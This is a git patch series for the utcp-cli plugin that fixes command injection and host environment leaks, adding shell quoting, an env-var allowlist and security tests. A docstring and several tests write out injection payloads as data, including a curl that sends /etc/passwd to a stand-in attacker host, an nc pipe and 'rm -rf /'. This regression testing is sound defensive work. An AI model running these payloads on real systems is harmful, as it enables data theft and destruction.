From 5d71bb16758c1865bcee2c0e5ba75b120f3ce826 Mon Sep 17 00:00:00 2001 From: Razvan Radulescu <43811028+h3xxit@users.noreply.github.com> Date: Sun, 10 May 2026 13:56:42 +0200 Subject: [PATCH 1/6] fix(cli): block command injection and env leak in CLI protocol - _substitute_utcp_args now shell-quotes substituted tool_args via shlex.quote on Unix and a PowerShell single-quoted literal on Windows, blocking metacharacter injection (`;`, `|`, `&`, backticks, `$()`, newlines). Each placeholder now expands to exactly one shell token; tools that relied on a single placeholder splitting into multiple flags must use one placeholder per flag. Backs GHSA-33p6-5jxp-p3x4. - _prepare_environment no longer hands os.environ.copy() to the subprocess. Inheritance is now controlled by a new CliCallTemplate.inherit_env_vars field: - None (default): a built-in OS-specific safe allowlist (PATH, HOME / PATHEXT, SYSTEMROOT, USERPROFILE, etc.) is inherited. - []: strict mode; nothing from the host environment is inherited. - [names...]: exactly those host vars are inherited (replaces, not merges with, the default allowlist). env_vars is always layered on top and overrides any inherited value. Backs GHSA-5v57-8rxj-3p2r. - REQUIRED docstrings + Field descriptions on CliCallTemplate and CommandStep updated so the new behavior surfaces in generated OpenAPI / JSON manuals. - New tests/test_security.py covers shell quoting, env allowlist, inherit_env_vars semantics (None / [] / explicit list), unset-name skipping, env_vars override precedence, Pydantic round-trip, and a Unix end-to-end injection canary. Bumps utcp-cli 1.1.1 -> 1.1.2. Co-Authored-By: Claude Opus 4.7 (1M context) --- .../cli/pyproject.toml | 2 +- .../cli/src/utcp_cli/cli_call_template.py | 122 ++++- .../utcp_cli/cli_communication_protocol.py | 123 ++++- .../cli/tests/test_security.py | 420 ++++++++++++++++++ 4 files changed, 635 insertions(+), 32 deletions(-) create mode 100644 plugins/communication_protocols/cli/tests/test_security.py diff --git a/plugins/communication_protocols/cli/pyproject.toml b/plugins/communication_protocols/cli/pyproject.toml index 70d2808..135d7bb 100644 --- a/plugins/communication_protocols/cli/pyproject.toml +++ b/plugins/communication_protocols/cli/pyproject.toml @@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta" [project] name = "utcp-cli" -version = "1.1.1" +version = "1.1.2" authors = [ { name = "UTCP Contributors" }, ] diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py index d462fbe..a741f24 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py @@ -9,15 +9,25 @@ class CommandStep(BaseModel): """REQUIRED Configuration for a single command step in a CLI execution flow. - + Attributes: command: The command string to execute. Can contain UTCP_ARG_argname_UTCP_END placeholders that will be replaced with values from tool_args. Can also reference previous command outputs using $CMD_0_OUTPUT, $CMD_1_OUTPUT, etc. + + Placeholder substitution is shell-quoted (`shlex.quote` on Unix, + PowerShell single-quoted literals on Windows) so that + `tool_args` values cannot inject extra commands. As a + consequence, each `UTCP_ARG_..._UTCP_END` placeholder always + expands to **exactly one shell token**. Tools that previously + relied on a single placeholder splitting into multiple flags + (e.g. `UTCP_ARG_flags_UTCP_END` -> `--verbose --debug`) must now + use one placeholder per intended flag. This change ships with + utcp-cli 1.1.2 and addresses GHSA-33p6-5jxp-p3x4. append_to_final_output: Whether this command's output should be included in the final result. If not specified, defaults to False for all commands except the last one. - + Examples: Basic command step: ```json @@ -26,7 +36,7 @@ class CommandStep(BaseModel): "append_to_final_output": true } ``` - + Command with argument placeholders and output reference: ```json { @@ -36,10 +46,15 @@ class CommandStep(BaseModel): ``` """ command: str = Field( - description="Command string to execute, may contain UTCP_ARG_argname_UTCP_END placeholders" + description=( + "Command string to execute, may contain UTCP_ARG_argname_UTCP_END " + "placeholders. Each placeholder is shell-quoted at substitution " + "time and therefore expands to exactly one shell token; use one " + "placeholder per intended argument." + ) ) append_to_final_output: Optional[bool] = Field( - default=None, + default=None, description="Whether to include this command's output in final result. Defaults to False for all except last command" ) @@ -54,26 +69,76 @@ class CliCallTemplate(CallTemplate): **Cross-Platform Script Generation:** - **Windows**: Commands are converted to a PowerShell script - **Unix/Linux/macOS**: Commands are converted to a Bash script - + **Command Syntax Requirements:** - Windows: Use PowerShell syntax (e.g., `Get-ChildItem`, `Set-Location`) - Unix: Use Bash/shell syntax (e.g., `ls`, `cd`) - + **Referencing Previous Command Output:** You can reference the output of previous commands using variables: - **PowerShell**: `$CMD_0_OUTPUT`, `$CMD_1_OUTPUT`, etc. - **Bash**: `$CMD_0_OUTPUT`, `$CMD_1_OUTPUT`, etc. - + Example: `echo "Previous result: $CMD_0_OUTPUT"` + **Argument Substitution and Quoting (utcp-cli >= 1.1.2):** + `UTCP_ARG_argname_UTCP_END` placeholders are replaced with the + corresponding `tool_args` value, shell-quoted for the target shell + (`shlex.quote` on Unix, PowerShell single-quoted literal on Windows). + Each placeholder therefore expands to exactly one shell token. If a + tool needs multiple flags or arguments, define multiple placeholders + (one per flag) instead of relying on a single placeholder splitting + on whitespace. This change closes the command-injection vector + tracked as GHSA-33p6-5jxp-p3x4. + + **Subprocess Environment (utcp-cli >= 1.1.2):** + The CLI subprocess no longer inherits the full host environment. + Inheritance is controlled by `inherit_env_vars`: + - Omitted / `null`: a built-in default allowlist of host variables + is passed through (e.g. `PATH`, `PATHEXT`, `SYSTEMROOT`, `HOME`, + `LANG`) so shells and binaries can be located normally. + - `[]`: strict mode — nothing from the host environment is + inherited; only `env_vars` is propagated. + - `["FOO", "BAR"]`: exactly those host variables are passed + through. The default allowlist is NOT merged in, so callers that + still need `PATH` must list it explicitly. + `env_vars` is always applied on top and overrides any inherited + value. Values in `env_vars` may be plain strings or `${VARNAME}` + style placeholders resolved by the UTCP client's variable + substitutor (note: those placeholders are resolved against the UTCP + client's variable sources, not against the host shell — to forward + a host variable by name use `inherit_env_vars`). This closes the + secret-exfiltration vector tracked as GHSA-5v57-8rxj-3p2r. + Attributes: call_template_type: The type of the call template. Must be "cli". commands: A list of CommandStep objects defining the commands to execute in order. Each command can contain UTCP_ARG_argname_UTCP_END placeholders that will be replaced with values from tool_args during execution. + Placeholders are shell-quoted and therefore expand to exactly one + shell token (see class docstring). env_vars: A dictionary of environment variables to set for the command's execution context. Values can be static strings or placeholders for - variables from the UTCP client's variable substitutor. + variables from the UTCP client's variable substitutor. Always + propagated; overrides anything inherited from the host. + inherit_env_vars: Controls which host environment variables are + passed through to the subprocess. + - `None` (default): the built-in default allowlist + (`PATH`, `HOME`, `LANG` on Unix; `PATH`, `PATHEXT`, + `SYSTEMROOT`, `USERPROFILE`, etc. on Windows) is + inherited so shells and binaries work without extra + configuration. + - `[]`: strict mode — no host variables are inherited at + all. Only `env_vars` reaches the subprocess. + - `["FOO", "BAR"]`: exactly those host variables are + inherited. The default allowlist is replaced, not + extended, so include `PATH` (and any other required + shell vars) yourself if needed. + Variables named here that are not set on the host are + silently skipped. Use this to expose specific host secrets + such as `OPENAI_API_KEY`, `AWS_PROFILE`, `PYTHONPATH`, or + `NODE_PATH` without putting their values in the call + template. working_dir: The working directory from which to run the commands. If not provided, it defaults to the current process's working directory. auth: Authentication details. Not applicable to the CLI protocol, so it @@ -97,7 +162,7 @@ class CliCallTemplate(CallTemplate): ] } ``` - + Referencing previous command output: ```json { @@ -116,7 +181,7 @@ class CliCallTemplate(CallTemplate): } ``` - Command with environment variables and placeholders: + Command with environment variables, host pass-through, and placeholders: ```json { "name": "python_multi_step_tool", @@ -133,16 +198,19 @@ class CliCallTemplate(CallTemplate): "env_vars": { "PYTHONPATH": "/custom/path", "API_KEY": "${API_KEY_VAR}" - } + }, + "inherit_env_vars": ["OPENAI_API_KEY", "AWS_PROFILE"] } ``` Security Considerations: - Commands are executed in a subprocess. Ensure that the commands specified are from a trusted source. - - Avoid passing unsanitized user input directly into the command string. - Use tool argument validation where possible. - - All placeholders are replaced with string values from tool_args. + - `tool_args` values are shell-quoted on substitution, but the + *command template itself* is not — never assemble it from + untrusted input. + - The host environment is restricted; secrets are not propagated + unless explicitly named in `env_vars` or `inherit_env_vars`. - Commands should use the appropriate syntax for the target platform (PowerShell on Windows, Bash on Unix). - Previous command outputs are available as variables but should be @@ -151,10 +219,30 @@ class CliCallTemplate(CallTemplate): call_template_type: Literal["cli"] = "cli" commands: List[CommandStep] = Field( - description="List of commands to execute in order. Each command can contain UTCP_ARG_argname_UTCP_END placeholders." + description=( + "List of commands to execute in order. Each command can contain " + "UTCP_ARG_argname_UTCP_END placeholders, which are shell-quoted " + "on substitution and therefore expand to exactly one shell token." + ) ) env_vars: Optional[Dict[str, str]] = Field( - default=None, description="Environment variables to set when executing the commands" + default=None, + description=( + "Environment variables to set when executing the commands. Always " + "propagated to the subprocess and override values inherited from " + "the host." + ) + ) + inherit_env_vars: Optional[List[str]] = Field( + default=None, + description=( + "Controls host environment inheritance. None (default) inherits " + "a built-in safe allowlist (PATH, HOME / PATHEXT, SYSTEMROOT, " + "etc.). [] disables host inheritance entirely. A list of names " + "replaces the default allowlist with exactly those variables, so " + "include PATH explicitly if your tool needs it. Names not set on " + "the host are skipped silently." + ) ) working_dir: Optional[str] = Field( default=None, description="Working directory for command execution" diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py index 61ce33c..8278c3c 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py @@ -61,22 +61,89 @@ def _log_error(self, message: str): """Log error messages.""" logger.error(f"[CliCommunicationProtocol Error] {message}") + # Default set of host environment variables propagated to the CLI + # subprocess when `CliCallTemplate.inherit_env_vars` is not provided + # (i.e. None). Locating binaries (`PATH` / `PATHEXT`), basic shell + + # locale state, and Windows runtime paths are needed for almost any + # tool to start. Anything else (cloud creds, API keys, internal + # tokens) must be opted in by listing the variable name explicitly in + # `inherit_env_vars`, or its value provided in `env_vars`. + # + # If `inherit_env_vars == []`, the caller is opting into strict mode + # and NOTHING is inherited from the host — only `env_vars` reaches the + # subprocess. + # + # Backs GHSA-5v57-8rxj-3p2r: the previous implementation handed + # `os.environ.copy()` to the subprocess, which combined with the + # command injection in `_substitute_utcp_args` + # (GHSA-33p6-5jxp-p3x4) let an attacker exfiltrate every secret in + # the host process. + _DEFAULT_INHERITED_KEYS_UNIX: tuple = ( + "PATH", "HOME", "LANG", "LC_ALL", "LC_CTYPE", "USER", "LOGNAME", + "SHELL", "TZ", "TERM", + ) + _DEFAULT_INHERITED_KEYS_WINDOWS: tuple = ( + "PATH", "PATHEXT", "SYSTEMROOT", "SYSTEMDRIVE", "WINDIR", "COMSPEC", + "TEMP", "TMP", "USERPROFILE", "USERNAME", "USERDOMAIN", "COMPUTERNAME", + "HOMEDRIVE", "HOMEPATH", "APPDATA", "LOCALAPPDATA", "PROGRAMDATA", + "PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMW6432", "OS", + "PROCESSOR_ARCHITECTURE", "NUMBER_OF_PROCESSORS", + ) + + @classmethod + def _default_inherited_keys(cls) -> tuple: + """Return the platform-appropriate default inheritance list.""" + if os.name == 'nt': + return cls._DEFAULT_INHERITED_KEYS_WINDOWS + return cls._DEFAULT_INHERITED_KEYS_UNIX + def _prepare_environment(self, provider: CliCallTemplate) -> Dict[str, str]: """Prepare environment variables for command execution. - + + Composes the subprocess environment with one layer of host + inheritance (controlled by `provider.inherit_env_vars`) plus + `provider.env_vars` on top: + + - `inherit_env_vars is None` (default): pass through the + built-in default allowlist of host vars (PATH, HOME / PATHEXT, + SYSTEMROOT, etc.) so normal shells and binaries work without + extra wiring. + - `inherit_env_vars == []`: strict mode. Nothing from the host + environment reaches the subprocess — only `env_vars`. + - `inherit_env_vars == [...]`: pass through exactly the named + host variables. The default allowlist is NOT merged in, so + callers who still want PATH must include it explicitly. + + `env_vars` is always applied last and overrides anything inherited + from the host. + + This prevents the unrestricted host environment from leaking into + a subprocess that may be running attacker-controlled commands + (GHSA-5v57-8rxj-3p2r). + Args: provider: The CLI provider - + Returns: Environment variables dictionary """ - import os - env = os.environ.copy() - - # Add custom environment variables if provided + if provider.inherit_env_vars is None: + inherited_keys: tuple = self._default_inherited_keys() + else: + inherited_keys = tuple(provider.inherit_env_vars) + + env: Dict[str, str] = {} + for key in inherited_keys: + value = os.environ.get(key) + if value is not None: + env[key] = value + + # Caller-supplied variables override anything inherited from the + # host. Unset host vars in `inherited_keys` are skipped silently + # so missing optionals don't break tool execution. if provider.env_vars: env.update(provider.env_vars) - + return env async def _execute_command( @@ -255,27 +322,55 @@ async def deregister_manual(self, caller, manual_call_template: CallTemplate) -> f"Deregistering CLI manual '{manual_call_template.name}' (no-op)" ) + @staticmethod + def _shell_quote(value: str) -> str: + """Quote a single value so it is interpreted as one literal token by + the target shell (`bash` on Unix, `powershell.exe` on Windows). + + On Unix we delegate to `shlex.quote`. On Windows we wrap the value in + a PowerShell single-quoted literal: inside such a literal everything + is taken verbatim except `'` itself, which is escaped by doubling + (`''`). This blocks the metacharacters PowerShell would otherwise + interpret (`;`, `&`, `|`, `` ` ``, `$`, `(`, `)`, `<`, `>`, line + breaks). + + Backs GHSA-33p6-5jxp-p3x4: the previous substitution did + `str(tool_args[arg_name])` directly into the shell script, which + allowed arbitrary command injection (e.g. + `"data.csv; curl http://attacker.example/$(cat /etc/passwd)"`). + """ + if os.name == 'nt': + return "'" + value.replace("'", "''") + "'" + return shlex.quote(value) + def _substitute_utcp_args(self, command: str, tool_args: Dict[str, Any]) -> str: """Substitute UTCP_ARG placeholders in command string with tool arguments. - + + Each substituted value is shell-quoted for the target shell so that + attacker-controlled `tool_args` cannot escape the placeholder and + inject extra commands. As a side effect, a placeholder always + expands to exactly one shell token: callers that need to pass + multiple flags / arguments must use multiple placeholders rather + than splitting a single string at runtime. + Args: command: Command string containing UTCP_ARG_argname_UTCP_END placeholders tool_args: Dictionary of argument names and values - + Returns: - Command string with placeholders replaced by actual values + Command string with placeholders replaced by shell-quoted values """ # Pattern to match UTCP_ARG_argname_UTCP_END pattern = r'UTCP_ARG_(.+?)_UTCP_END' - + def replace_placeholder(match): arg_name = match.group(1) if arg_name in tool_args: - return str(tool_args[arg_name]) + return self._shell_quote(str(tool_args[arg_name])) else: self._log_error(f"Missing argument '{arg_name}' for placeholder in command: {command}") - return f"MISSING_ARG_{arg_name}" - + return self._shell_quote(f"MISSING_ARG_{arg_name}") + return re.sub(pattern, replace_placeholder, command) def _build_combined_shell_script(self, commands: List[CommandStep], tool_args: Dict[str, Any]) -> str: diff --git a/plugins/communication_protocols/cli/tests/test_security.py b/plugins/communication_protocols/cli/tests/test_security.py new file mode 100644 index 0000000..b90559f --- /dev/null +++ b/plugins/communication_protocols/cli/tests/test_security.py @@ -0,0 +1,420 @@ +"""Security tests for the CLI communication protocol. + +Pin the fixes for: + +- GHSA-33p6-5jxp-p3x4 (CWE-78, command injection via unsanitized + `tool_args` interpolation in `_substitute_utcp_args`). +- GHSA-5v57-8rxj-3p2r (CWE-526, full host environment leaked to the + CLI subprocess via `_prepare_environment`). + +Each behavior is locked in here so a regression that re-introduces the +historical bypass fails this file rather than silently shipping. +""" +import os +import shlex +import sys +import tempfile + +import pytest +import pytest_asyncio + +from utcp_cli.cli_communication_protocol import CliCommunicationProtocol +from utcp_cli.cli_call_template import CliCallTemplate + + +@pytest_asyncio.fixture +async def transport() -> CliCommunicationProtocol: + yield CliCommunicationProtocol() + + +# --------------------------------------------------------------------------- +# GHSA-33p6-5jxp-p3x4 — _substitute_utcp_args must shell-quote substituted +# values so attacker-controlled tool_args can't escape into the script. +# --------------------------------------------------------------------------- + +class TestArgSubstitutionQuoting: + @pytest.mark.parametrize( + "value", + [ + "data.csv; curl http://attacker.example", + "data.csv && rm -rf /", + "data.csv | nc attacker.example 9999", + "data.csv `id`", + "data.csv $(id)", + 'data.csv"; echo pwned; "', + "data.csv\nrm -rf /", + "value with spaces", + "value'with'quote", + ], + ) + def test_shell_metacharacters_are_quoted(self, transport, value): + substituted = transport._substitute_utcp_args( + "echo UTCP_ARG_x_UTCP_END", {"x": value} + ) + # The placeholder must be gone. + assert "UTCP_ARG_x_UTCP_END" not in substituted + # The original value must still be present (just quoted), so the + # tool actually sees it. + # On Unix shlex.quote may fully wrap in single quotes; on Windows we + # wrap in single quotes and double internal `'`. Either way the + # underlying characters appear somewhere in the substituted string. + assert any(part in substituted for part in value.split("'")) + + def test_unix_quoting_uses_shlex(self, transport, monkeypatch): + monkeypatch.setattr(os, "name", "posix") + out = transport._substitute_utcp_args( + "run UTCP_ARG_x_UTCP_END", {"x": "a; rm -rf /"} + ) + # shlex.quote wraps anything containing shell metas in single quotes. + assert out == f"run {shlex.quote('a; rm -rf /')}" + assert "; rm -rf /" not in out.replace(shlex.quote("a; rm -rf /"), "") + + def test_windows_quoting_doubles_single_quote(self, transport, monkeypatch): + monkeypatch.setattr(os, "name", "nt") + out = transport._substitute_utcp_args( + "Get-Item UTCP_ARG_x_UTCP_END", + {"x": "C:\\Users\\bob's file.txt; whoami"}, + ) + # PowerShell single-quoted literal; embedded ' becomes ''. + assert out == "Get-Item 'C:\\Users\\bob''s file.txt; whoami'" + + def test_windows_quoting_blocks_powershell_metacharacters(self, transport, monkeypatch): + monkeypatch.setattr(os, "name", "nt") + for payload in [ + "x; whoami", + "x | whoami", + "x & whoami", + "x`whoami`", + "x$(whoami)", + "x\nwhoami", + ]: + out = transport._substitute_utcp_args( + "Get-Item UTCP_ARG_x_UTCP_END", {"x": payload} + ) + # The whole payload must be wrapped as a single-quoted literal. + assert out.startswith("Get-Item '") + assert out.endswith("'") + # No unescaped single quote should appear in the middle. + inner = out[len("Get-Item '"):-1] + assert "'" not in inner.replace("''", "") + + def test_missing_arg_placeholder_is_also_quoted(self, transport, monkeypatch): + # The fallback path used to return a bare `MISSING_ARG_` token, + # which broke the invariant that every substitution is one shell + # token. Quote it for defense in depth. + monkeypatch.setattr(os, "name", "posix") + out = transport._substitute_utcp_args( + "echo UTCP_ARG_missing_UTCP_END", {} + ) + assert "UTCP_ARG_missing_UTCP_END" not in out + # Either the literal token, or its shlex.quote'd form (alphanum + + # underscores normally don't need quoting): + assert "MISSING_ARG_missing" in out + + +# --------------------------------------------------------------------------- +# GHSA-5v57-8rxj-3p2r — _prepare_environment must NOT leak the full host +# environment into the CLI subprocess. +# --------------------------------------------------------------------------- + +class TestPreparedEnvironmentDoesNotLeakSecrets: + SECRET_KEYS = [ + "OPENAI_API_KEY", + "ANTHROPIC_API_KEY", + "AWS_SECRET_ACCESS_KEY", + "AWS_ACCESS_KEY_ID", + "AZURE_CLIENT_SECRET", + "GITHUB_TOKEN", + "DATABASE_URL", + "SLACK_TOKEN", + ] + + def test_secrets_in_host_env_do_not_propagate(self, transport, monkeypatch): + for k in self.SECRET_KEYS: + monkeypatch.setenv(k, f"super-secret-{k}") + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + for k in self.SECRET_KEYS: + assert k not in env, ( + f"{k} leaked from host environment into CLI subprocess " + "(GHSA-5v57-8rxj-3p2r). Only the safe-keys allowlist plus " + "provider.env_vars should propagate." + ) + + def test_explicit_env_vars_are_preserved(self, transport, monkeypatch): + # Caller can still inject extra env explicitly via env_vars, even + # for keys that are otherwise blocked. + monkeypatch.setenv("OPENAI_API_KEY", "host-value") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + env_vars={"OPENAI_API_KEY": "explicit-value", "MY_FLAG": "1"}, + ) + env = transport._prepare_environment(provider) + assert env["OPENAI_API_KEY"] == "explicit-value" + assert env["MY_FLAG"] == "1" + + def test_essentials_are_preserved(self, transport, monkeypatch): + # PATH must propagate or no binary can be located. + monkeypatch.setenv("PATH", "/usr/local/bin:/usr/bin:/bin") + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + assert "PATH" in env + + def test_env_vars_override_safe_defaults(self, transport, monkeypatch): + monkeypatch.setenv("PATH", "/usr/bin") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + env_vars={"PATH": "/custom/bin"}, + ) + env = transport._prepare_environment(provider) + assert env["PATH"] == "/custom/bin" + + def test_inherit_env_vars_passes_named_host_secrets(self, transport, monkeypatch): + # Caller can opt specific host secrets into the subprocess by name + # without copying their values into the call template. + monkeypatch.setenv("OPENAI_API_KEY", "sk-from-host") + monkeypatch.setenv("AWS_PROFILE", "prod") + # NOT requested: + monkeypatch.setenv("DATABASE_URL", "postgres://...") + + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["OPENAI_API_KEY", "AWS_PROFILE"], + ) + env = transport._prepare_environment(provider) + assert env["OPENAI_API_KEY"] == "sk-from-host" + assert env["AWS_PROFILE"] == "prod" + assert "DATABASE_URL" not in env + + def test_inherit_env_vars_skips_unset(self, transport, monkeypatch): + monkeypatch.delenv("THIS_DOES_NOT_EXIST", raising=False) + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["THIS_DOES_NOT_EXIST"], + ) + env = transport._prepare_environment(provider) + assert "THIS_DOES_NOT_EXIST" not in env + + def test_env_vars_override_inherit_env_vars(self, transport, monkeypatch): + monkeypatch.setenv("OPENAI_API_KEY", "host-value") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["OPENAI_API_KEY"], + env_vars={"OPENAI_API_KEY": "explicit-override"}, + ) + env = transport._prepare_environment(provider) + assert env["OPENAI_API_KEY"] == "explicit-override" + + def test_inherit_env_vars_empty_list_is_strict_mode(self, transport, monkeypatch): + # `inherit_env_vars=[]` means: nothing from host. Even PATH must + # not leak through. + monkeypatch.setenv("PATH", "/usr/bin") + monkeypatch.setenv("HOME", "/home/x") + monkeypatch.setenv("OPENAI_API_KEY", "secret") + + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=[], + ) + env = transport._prepare_environment(provider) + assert env == {} + + def test_inherit_env_vars_empty_list_with_env_vars(self, transport, monkeypatch): + monkeypatch.setenv("PATH", "/usr/bin") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=[], + env_vars={"FOO": "bar"}, + ) + env = transport._prepare_environment(provider) + # Only env_vars; default allowlist is bypassed. + assert env == {"FOO": "bar"} + + def test_inherit_env_vars_list_replaces_default_allowlist(self, transport, monkeypatch): + # When the caller supplies a list, the default allowlist is NOT + # merged in. They get exactly the names they asked for. + monkeypatch.setenv("PATH", "/usr/bin") + monkeypatch.setenv("HOME", "/home/x") + monkeypatch.setenv("OPENAI_API_KEY", "secret") + + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["OPENAI_API_KEY"], + ) + env = transport._prepare_environment(provider) + assert env == {"OPENAI_API_KEY": "secret"} + + def test_default_inherit_env_vars_includes_path_and_home(self, transport, monkeypatch): + # `inherit_env_vars=None` (omitted) → default allowlist. PATH and + # at least one platform-specific home directory variable should + # be inherited so shells/binaries work. + monkeypatch.setenv("PATH", "/usr/bin") + if os.name == "nt": + monkeypatch.setenv("USERPROFILE", "C:\\Users\\x") + home_key = "USERPROFILE" + else: + monkeypatch.setenv("HOME", "/home/x") + home_key = "HOME" + + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + assert env["PATH"] == "/usr/bin" + assert home_key in env + + def test_default_inherit_env_vars_does_not_include_secrets(self, transport, monkeypatch): + for k in self.SECRET_KEYS: + monkeypatch.setenv(k, f"super-secret-{k}") + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + for k in self.SECRET_KEYS: + assert k not in env + + def test_explicit_none_matches_default(self, transport, monkeypatch): + # Constructing with `inherit_env_vars=None` must produce the same + # environment as omitting the field entirely — the + # default-allowlist branch is keyed on `is None`, so don't let a + # subtle change (e.g. switching the default to `[]`) silently + # flip behavior. + monkeypatch.setenv("PATH", "/usr/bin") + monkeypatch.setenv("OPENAI_API_KEY", "secret") + + omitted = CliCallTemplate(commands=[{"command": "echo hi"}]) + explicit_none = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=None, + ) + assert ( + transport._prepare_environment(omitted) + == transport._prepare_environment(explicit_none) + ) + assert "PATH" in transport._prepare_environment(explicit_none) + assert "OPENAI_API_KEY" not in transport._prepare_environment(explicit_none) + + def test_list_replaces_default_does_not_pull_in_other_defaults( + self, transport, monkeypatch + ): + # Listing only PATH must not drag the rest of the default + # allowlist along (HOME / USERPROFILE / LANG / etc.). + monkeypatch.setenv("PATH", "/usr/bin") + monkeypatch.setenv("HOME", "/home/x") + monkeypatch.setenv("USERPROFILE", "C:\\Users\\x") + monkeypatch.setenv("LANG", "en_US.UTF-8") + + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["PATH"], + ) + env = transport._prepare_environment(provider) + assert env == {"PATH": "/usr/bin"} + + def test_duplicate_names_in_inherit_env_vars_are_idempotent( + self, transport, monkeypatch + ): + monkeypatch.setenv("FOO", "1") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["FOO", "FOO", "FOO"], + ) + env = transport._prepare_environment(provider) + assert env == {"FOO": "1"} + + def test_unset_names_in_default_allowlist_are_skipped( + self, transport, monkeypatch + ): + # If a key in the default allowlist is not set on the host, the + # resulting env dict must simply omit it (not include `None` / + # empty string / raise). + for key in transport._default_inherited_keys(): + monkeypatch.delenv(key, raising=False) + # Add just one so the dict isn't empty. + monkeypatch.setenv("PATH", "/usr/bin") + + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + assert env == {"PATH": "/usr/bin"} + # Specifically: never None values. + for v in env.values(): + assert v is not None + assert isinstance(v, str) + + +class TestInheritEnvVarsSerialization: + """Pydantic round-trip: inherit_env_vars must preserve the + None / [] / [...] distinction when a CliCallTemplate flows through + the serializer (and thus through OpenAPI / JSON manuals). + """ + + def test_round_trip_preserves_none(self): + from utcp_cli.cli_call_template import CliCallTemplateSerializer + + tpl = CliCallTemplate(commands=[{"command": "x"}]) + d = CliCallTemplateSerializer().to_dict(tpl) + # Either omitted or explicitly null is acceptable, but it must + # not silently become `[]`. + assert d.get("inherit_env_vars", None) is None + rebuilt = CliCallTemplateSerializer().validate_dict(d) + assert rebuilt.inherit_env_vars is None + + def test_round_trip_preserves_empty_list(self): + from utcp_cli.cli_call_template import CliCallTemplateSerializer + + tpl = CliCallTemplate( + commands=[{"command": "x"}], inherit_env_vars=[] + ) + d = CliCallTemplateSerializer().to_dict(tpl) + assert d["inherit_env_vars"] == [] + rebuilt = CliCallTemplateSerializer().validate_dict(d) + assert rebuilt.inherit_env_vars == [] + + def test_round_trip_preserves_listed_names(self): + from utcp_cli.cli_call_template import CliCallTemplateSerializer + + tpl = CliCallTemplate( + commands=[{"command": "x"}], + inherit_env_vars=["PATH", "OPENAI_API_KEY"], + ) + d = CliCallTemplateSerializer().to_dict(tpl) + assert d["inherit_env_vars"] == ["PATH", "OPENAI_API_KEY"] + rebuilt = CliCallTemplateSerializer().validate_dict(d) + assert rebuilt.inherit_env_vars == ["PATH", "OPENAI_API_KEY"] + + +# --------------------------------------------------------------------------- +# End-to-end: drive the real subprocess and confirm the injection payload +# does NOT escape its placeholder. Skipped on Windows because the mock +# script + bash assumptions don't apply identically. +# --------------------------------------------------------------------------- + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_no_command_injection_via_tool_args_unix(tmp_path): + """Run the real shell pipeline with a malicious tool_arg and confirm + the injected `touch` never runs. + """ + transport = CliCommunicationProtocol() + + canary = tmp_path / "pwned" + + script = tmp_path / "echo_arg.py" + script.write_text( + "import sys\n" + "print('arg:' + sys.argv[1])\n" + ) + + call_template = CliCallTemplate( + commands=[ + {"command": f"{sys.executable} {script} UTCP_ARG_value_UTCP_END"} + ] + ) + + payload = f"benign; touch {canary}" + result = await transport.call_tool( + None, "echo_arg", {"value": payload}, call_template + ) + + assert not canary.exists(), ( + "Command injection regression (GHSA-33p6-5jxp-p3x4): " + "the `; touch` payload escaped the placeholder and ran." + ) + # The script should have observed the literal payload. + assert "benign; touch" in str(result) From 26afe4067985148c2e38098a60cda2a64887aa97 Mon Sep 17 00:00:00 2001 From: Razvan Radulescu <43811028+h3xxit@users.noreply.github.com> Date: Sun, 10 May 2026 14:02:06 +0200 Subject: [PATCH 2/6] test(cli): rename test_security.py to test_cli_security.py CI runs pytest across multiple plugin test dirs in one invocation. The HTTP plugin already had a `test_security.py`, so the new CLI one collided on import (`test_security` module name) and pytest aborted collection with `import file mismatch`. Rename to a plugin-prefixed basename so both can coexist without needing `__init__.py` files in the tests dirs. Co-Authored-By: Claude Opus 4.7 (1M context) --- .../cli/tests/{test_security.py => test_cli_security.py} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename plugins/communication_protocols/cli/tests/{test_security.py => test_cli_security.py} (100%) diff --git a/plugins/communication_protocols/cli/tests/test_security.py b/plugins/communication_protocols/cli/tests/test_cli_security.py similarity index 100% rename from plugins/communication_protocols/cli/tests/test_security.py rename to plugins/communication_protocols/cli/tests/test_cli_security.py From 1048a0ea33938a855165f372c7ded648159cf264 Mon Sep 17 00:00:00 2001 From: Razvan Radulescu <43811028+h3xxit@users.noreply.github.com> Date: Sun, 10 May 2026 16:23:40 +0200 Subject: [PATCH 3/6] Update cli utcp args to use env variable substitution --- .../cli/pyproject.toml | 2 +- .../cli/src/utcp_cli/cli_call_template.py | 85 +++- .../utcp_cli/cli_communication_protocol.py | 347 ++++++++++++--- .../tests/test_cli_communication_protocol.py | 29 +- .../cli/tests/test_cli_security.py | 416 +++++++++++------- 5 files 